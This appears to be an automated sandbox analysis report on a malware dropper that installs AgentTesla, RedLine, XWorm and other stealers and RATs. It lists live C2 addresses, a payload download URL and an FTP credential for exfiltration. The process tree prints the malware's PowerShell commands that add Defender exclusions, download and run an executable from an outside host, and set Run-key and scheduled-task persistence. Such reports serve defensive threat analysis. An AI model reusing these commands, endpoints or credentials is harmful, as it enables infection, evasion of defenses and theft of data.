agenttesla | 98e895f711226a32bfab152e224279d859799243845c46e550c2d32153c619fc

Resubmissions

09-04-2024 13:27

240409-qqa5hsbd5t 10

09-04-2024 13:27

09-04-2024 13:27

09-04-2024 13:27

18-11-2023 14:44

Analysis

max time kernel
6s
max time network
163s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
09-04-2024 13:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

New Text Document.exe
Size

4KB
MD5

a239a27c2169af388d4f5be6b52f272c
SHA1

0feb9a0cd8c25f01d071e9b2cfc2ae7bd430318c
SHA256

98e895f711226a32bfab152e224279d859799243845c46e550c2d32153c619fc
SHA512

f30e1ff506cc4d729f7e24aa46e832938a5e21497f1f82f1b300d47f45dae7f1caef032237ef1f5ae9001195c43c0103e3ab787f9196c8397846c1dea8f351da
SSDEEP

48:6r1huik0xzYGJZZJOQOulbfSqXSfbNtm:IIxcLpf6zNt

Score

10^/10

agenttesla dcrat quasar redline stealc xworm zgrat 50502 6077866846 @oleh_psp discovery evasion infostealer keylogger persistence rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://trello.com/1/cards/660a48f3ed8f660125aa4d31/attachments/66153d5497afda6d323e73ae/download/5885.exe

Extracted

Family

redline

Botnet

6077866846

https://pastebin.com/raw/KE5Mft0T

Extracted

Family

xworm

94.156.8.213:58002

127.0.0.1:18356

t-brave.gl.at.ply.gg:18356

Attributes

Install_directory
%Public%
install_file
svchost.exe

Extracted

Family

agenttesla

Credentials

Protocol: ftp
Host:
ftp://ftp.siscop.com.co
Port:
21
Username:
[email protected]
Password:
+5s48Ia2&-(t

Extracted

Family

redline

Botnet

50502

2.58.56.216:38382

Extracted

Family

redline

Botnet

@OLEH_PSP

185.172.128.33:8970

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Detect Xworm Payload 3 IoCs

resource	yara_rule
behavioral3/files/0x0007000000023232-243.dat	family_xworm
behavioral3/memory/3372-247-0x00000000004D0000-0x00000000004E6000-memory.dmp	family_xworm
behavioral3/files/0x000900000002323b-345.dat	family_xworm

Detect ZGRat V1 1 IoCs

resource	yara_rule
behavioral3/files/0x000b000000023252-670.dat	family_zgrat_v1

Process spawned unexpected child process 54 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5420	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3604	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5764	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	240	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1432	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6020	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5980	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4916	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4864	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1516	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5408	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5700	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6140	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4744	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5036	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5092	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5180	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2936	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6080	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5468	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3188	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4836	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5476	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6044	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5356	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5964	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1964	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4744	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5840	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6072	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5504	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5904	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4532	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3136	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	832	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1932	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5844	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5032	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2784	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2088	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5408	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1568	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5664	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2788	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2752	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2176	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5004	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1280	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3872	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3264	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1696	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2908	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2324	552	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5948	552	schtasks.exe	100

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral3/files/0x000b0000000232a0-2626.dat	family_quasar

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 5 IoCs

resource	yara_rule
behavioral3/memory/4492-53-0x0000000000750000-0x0000000000772000-memory.dmp	family_redline
behavioral3/memory/308-497-0x0000000000400000-0x0000000000452000-memory.dmp	family_redline
behavioral3/files/0x0007000000023258-769.dat	family_redline
behavioral3/files/0x000700000002325d-799.dat	family_redline
behavioral3/files/0x000700000002325c-825.dat	family_redline

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

DCRat payload 2 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral3/files/0x000800000002325b-2484.dat	dcrat
behavioral3/files/0x00050000000162b4-2922.dat	dcrat

Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation	New Text Document.exe

Executes dropped EXE 4 IoCs

pid	Process
4760	wininit.exe
772	cccc.exe
4492	crypted6077866846MVYQY.exe
1980	i1gcbW1E.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
22	raw.githubusercontent.com
23	raw.githubusercontent.com
33	pastebin.com
34	pastebin.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
91	ip-api.com

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral3/files/0x000700000002321f-7.dat	autoit_exe
behavioral3/files/0x0009000000023223-359.dat	autoit_exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3376	sc.exe
5876	sc.exe
772	sc.exe
6068	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 14 IoCs

pid	pid_target	Process	procid_target
2420	1576	WerFault.exe	105
2788	2712	WerFault.exe	129
2588	4048	WerFault.exe	142
5924	5404	WerFault.exe	157
444	5992	WerFault.exe	173
5816	5308	WerFault.exe	183
3768	5140	WerFault.exe	192
5992	2368	WerFault.exe	189
5296	6116	WerFault.exe	193
1356	6024	WerFault.exe	196
4152	5412	WerFault.exe	180
5284	2080	WerFault.exe	209
4200	1248	WerFault.exe	265
1192	1432	WerFault.exe	247

Creates scheduled task(s) 1 TTPs 61 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4744	schtasks.exe
4000	schtasks.exe
5980	schtasks.exe
3188	schtasks.exe
5948	schtasks.exe
5764	schtasks.exe
6044	schtasks.exe
5664	schtasks.exe
3264	schtasks.exe
2324	schtasks.exe
4508	schtasks.exe
5504	schtasks.exe
2176	schtasks.exe
5468	schtasks.exe
2784	schtasks.exe
2788	schtasks.exe
5004	schtasks.exe
6140	schtasks.exe
4744	schtasks.exe
3872	schtasks.exe
5964	schtasks.exe
1964	schtasks.exe
1568	schtasks.exe
1608	schtasks.exe
5844	schtasks.exe
1516	schtasks.exe
5408	schtasks.exe
6080	schtasks.exe
4836	schtasks.exe
4532	schtasks.exe
2088	schtasks.exe
5696	schtasks.exe
3188	schtasks.exe
5420	schtasks.exe
5092	schtasks.exe
5180	schtasks.exe
2936	schtasks.exe
5840	schtasks.exe
5408	schtasks.exe
1432	schtasks.exe
5356	schtasks.exe
5032	schtasks.exe
3604	schtasks.exe
240	schtasks.exe
4916	schtasks.exe
4864	schtasks.exe
5700	schtasks.exe
5476	schtasks.exe
4004	schtasks.exe
832	schtasks.exe
2752	schtasks.exe
6072	schtasks.exe
2908	schtasks.exe
5036	schtasks.exe
5844	schtasks.exe
6020	schtasks.exe
5904	schtasks.exe
3136	schtasks.exe
1932	schtasks.exe
1280	schtasks.exe
1696	schtasks.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
1680	timeout.exe
1964	timeout.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5140	PING.EXE

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
772	cccc.exe
3596	powershell.exe
4492	crypted6077866846MVYQY.exe
3596	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	3144	New Text Document.exe
Token: SeDebugPrivilege	772	cccc.exe
Token: SeDebugPrivilege	3596	powershell.exe
Token: SeDebugPrivilege	4492	crypted6077866846MVYQY.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
4760	wininit.exe
4760	wininit.exe

Suspicious use of SendNotifyMessage 2 IoCs

pid	Process
4760	wininit.exe
4760	wininit.exe

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 3144 wrote to memory of 4760	3144	New Text Document.exe	90
PID 3144 wrote to memory of 4760	3144	New Text Document.exe	90
PID 3144 wrote to memory of 4760	3144	New Text Document.exe	90
PID 3144 wrote to memory of 772	3144	New Text Document.exe	93
PID 3144 wrote to memory of 772	3144	New Text Document.exe	93
PID 3144 wrote to memory of 772	3144	New Text Document.exe	93
PID 772 wrote to memory of 1344	772	cccc.exe	94
PID 772 wrote to memory of 1344	772	cccc.exe	94
PID 772 wrote to memory of 1344	772	cccc.exe	94
PID 1344 wrote to memory of 3596	1344	cmd.exe	96
PID 1344 wrote to memory of 3596	1344	cmd.exe	96
PID 1344 wrote to memory of 3596	1344	cmd.exe	96
PID 3144 wrote to memory of 4492	3144	New Text Document.exe	97
PID 3144 wrote to memory of 4492	3144	New Text Document.exe	97
PID 3144 wrote to memory of 4492	3144	New Text Document.exe	97
PID 3144 wrote to memory of 1980	3144	New Text Document.exe	99
PID 3144 wrote to memory of 1980	3144	New Text Document.exe	99

C:\Users\Admin\AppData\Local\Temp\New Text Document.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3144
- C:\Users\Admin\AppData\Local\Temp\a\wininit.exe
  "C:\Users\Admin\AppData\Local\Temp\a\wininit.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:4760
- C:\Users\Admin\AppData\Local\Temp\a\cccc.exe
  "C:\Users\Admin\AppData\Local\Temp\a\cccc.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:772
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C powershell.exe -Command Add-MpPreference -ExclusionPath %localappdata%; powershell -Command Add-MpPreference -ExclusionProcess "RuntimeBroker2.exe"; powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://trello.com/1/cards/660a48f3ed8f660125aa4d31/attachments/66153d5497afda6d323e73ae/download/5885.exe', 'RuntimeBroker2.exe')"; powershell -Command New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name RuntimeBroker2 -Value %localappdata%'\RuntimeBroker2.exe'; timeout /t 1 >nul;start RuntimeBroker2.exe;
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1344
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local; powershell -Command Add-MpPreference -ExclusionProcess "RuntimeBroker2.exe"; powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://trello.com/1/cards/660a48f3ed8f660125aa4d31/attachments/66153d5497afda6d323e73ae/download/5885.exe', 'RuntimeBroker2.exe')"; powershell -Command New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name RuntimeBroker2 -Value C:\Users\Admin\AppData\Local'\RuntimeBroker2.exe'; timeout /t 1 ;start RuntimeBroker2.exe;
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3596
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionProcess RuntimeBroker2.exe
        5⤵
        
        PID:4284
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command
        5⤵
        
        PID:2580
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name RuntimeBroker2 -Value C:\Users\Admin\AppData\Local\RuntimeBroker2.exe
        5⤵
        
        PID:4688
    - - C:\Windows\SysWOW64\timeout.exe
        
        "C:\Windows\system32\timeout.exe" /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:1680
    - - C:\Users\Admin\AppData\Local\RuntimeBroker2.exe
        
        "C:\Users\Admin\AppData\Local\RuntimeBroker2.exe"
        5⤵
        
        PID:5676
- C:\Users\Admin\AppData\Local\Temp\a\crypted6077866846MVYQY.exe
  "C:\Users\Admin\AppData\Local\Temp\a\crypted6077866846MVYQY.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4492
- C:\Users\Admin\AppData\Local\Temp\a\i1gcbW1E.exe
  "C:\Users\Admin\AppData\Local\Temp\a\i1gcbW1E.exe"
  2⤵
  - Executes dropped EXE
  PID:1980
- C:\Users\Admin\AppData\Local\Temp\a\disable-defender.exe
  "C:\Users\Admin\AppData\Local\Temp\a\disable-defender.exe"
  2⤵
  PID:1064
- C:\Users\Admin\AppData\Local\Temp\a\1234.exe
  "C:\Users\Admin\AppData\Local\Temp\a\1234.exe"
  2⤵
  PID:3836
- C:\Users\Admin\AppData\Local\Temp\a\ISetup8.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ISetup8.exe"
  2⤵
  PID:1576
- - C:\Users\Admin\AppData\Local\Temp\u17s.0.exe
    "C:\Users\Admin\AppData\Local\Temp\u17s.0.exe"
    3⤵
    PID:5024
- - C:\Users\Admin\AppData\Local\Temp\u17s.1.exe
    "C:\Users\Admin\AppData\Local\Temp\u17s.1.exe"
    3⤵
    PID:3696
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1576 -s 976
    3⤵
    - Program crash
    PID:2420
- C:\Users\Admin\AppData\Local\Temp\a\test2.exe
  "C:\Users\Admin\AppData\Local\Temp\a\test2.exe"
  2⤵
  PID:3324
- C:\Users\Admin\AppData\Local\Temp\a\1111.exe
  "C:\Users\Admin\AppData\Local\Temp\a\1111.exe"
  2⤵
  PID:2324
- C:\Users\Admin\AppData\Local\Temp\a\ISetup2.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ISetup2.exe"
  2⤵
  PID:4696
- C:\Users\Admin\AppData\Local\Temp\a\Tester.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Tester.exe"
  2⤵
  PID:460
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\svchost.exe'
    3⤵
    PID:1616
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
    3⤵
    PID:5348
- C:\Users\Admin\AppData\Local\Temp\a\svchost.exe
  "C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"
  2⤵
  PID:3372
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Public\svchost.exe"
    3⤵
    - Creates scheduled task(s)
    PID:4508
- C:\Users\Admin\AppData\Local\Temp\a\555.exe
  "C:\Users\Admin\AppData\Local\Temp\a\555.exe"
  2⤵
  PID:2920
- C:\Users\Admin\AppData\Local\Temp\a\Document.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Document.exe"
  2⤵
  PID:2216
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\Document.exe"
    3⤵
    PID:1380
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\gYVTyaODtj.exe"
    3⤵
    PID:2588
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gYVTyaODtj" /XML "C:\Users\Admin\AppData\Local\Temp\tmpA7B.tmp"
    3⤵
    - Creates scheduled task(s)
    PID:5696
- - C:\Users\Admin\AppData\Local\Temp\a\Document.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Document.exe"
    3⤵
    PID:5484
- - C:\Users\Admin\AppData\Local\Temp\a\Document.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Document.exe"
    3⤵
    PID:5300
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "msdtc" /tr '"C:\Users\Admin\AppData\Roaming\msdtc.exe"' & exit
      4⤵
      PID:6048
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "msdtc" /tr '"C:\Users\Admin\AppData\Roaming\msdtc.exe"'
        5⤵
        Creates scheduled task(s)
        
        PID:3188
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4292.tmp.bat""
      4⤵
      PID:2264
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:1964
    - - C:\Users\Admin\AppData\Roaming\msdtc.exe
        
        "C:\Users\Admin\AppData\Roaming\msdtc.exe"
        5⤵
        
        PID:5940
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\msdtc.exe"
        6⤵
        
        PID:3960
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\gYVTyaODtj.exe"
        6⤵
        
        PID:3688
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gYVTyaODtj" /XML "C:\Users\Admin\AppData\Local\Temp\tmpC32C.tmp"
        6⤵
        Creates scheduled task(s)
        
        PID:1608
      - C:\Users\Admin\AppData\Roaming\msdtc.exe
        
        "C:\Users\Admin\AppData\Roaming\msdtc.exe"
        6⤵
        
        PID:4456
- C:\Users\Admin\AppData\Local\Temp\a\BrawlB0t.exe
  "C:\Users\Admin\AppData\Local\Temp\a\BrawlB0t.exe"
  2⤵
  PID:3168
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\BrawlB0t.exe'
    3⤵
    PID:1728
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'BrawlB0t.exe'
    3⤵
    PID:3976
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\OneDrive.exe'
    3⤵
    PID:3148
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'
    3⤵
    PID:1976
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\Users\Admin\AppData\Roaming\OneDrive.exe"
    3⤵
    - Creates scheduled task(s)
    PID:4004
- C:\Users\Admin\AppData\Local\Temp\a\medcallaboratory5.exe
  "C:\Users\Admin\AppData\Local\Temp\a\medcallaboratory5.exe"
  2⤵
  PID:2712
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "C:\Users\Admin\AppData\Local\Temp\a\medcallaboratory5.exe"
    3⤵
    PID:3572
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2712 -s 696
    3⤵
    - Program crash
    PID:2788
- C:\Users\Admin\AppData\Local\Temp\a\PrintSpoofer.exe
  "C:\Users\Admin\AppData\Local\Temp\a\PrintSpoofer.exe"
  2⤵
  PID:2884
- C:\Users\Admin\AppData\Local\Temp\a\Adobe_update.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Adobe_update.exe"
  2⤵
  PID:4048
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:308
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4048 -s 792
    3⤵
    - Program crash
    PID:2588
- C:\Users\Admin\AppData\Local\Temp\a\Retailer_prog.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Retailer_prog.exe"
  2⤵
  PID:5384
- C:\Users\Admin\AppData\Local\Temp\a\BroomSetup.exe
  "C:\Users\Admin\AppData\Local\Temp\a\BroomSetup.exe"
  2⤵
  PID:5864
- - C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
    "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
    3⤵
    PID:2944
- C:\Users\Admin\AppData\Local\Temp\a\alexxxxxxxx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\alexxxxxxxx.exe"
  2⤵
  PID:5300
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:1732
  - - C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe
      "C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe"
      4⤵
      PID:5260
  - - C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe
      "C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe"
      4⤵
      PID:316
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
      4⤵
      PID:4740
    - - C:\Windows\SysWOW64\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:5784
- C:\Users\Admin\AppData\Local\Temp\a\syncUpd.exe
  "C:\Users\Admin\AppData\Local\Temp\a\syncUpd.exe"
  2⤵
  PID:5404
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5404 -s 1020
    3⤵
    - Program crash
    PID:5924
- C:\Users\Admin\AppData\Local\Temp\a\Ledger-Live.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Ledger-Live.exe"
  2⤵
  PID:5684
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\a\Ledger-Live.exe
    3⤵
    PID:6084
  - - C:\Windows\SysWOW64\PING.EXE
      ping 2.2.2.2 -n 1 -w 3000
      4⤵
      Runs ping.exe
      PID:5140
- C:\Users\Admin\AppData\Local\Temp\a\new1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\new1.exe"
  2⤵
  PID:5824
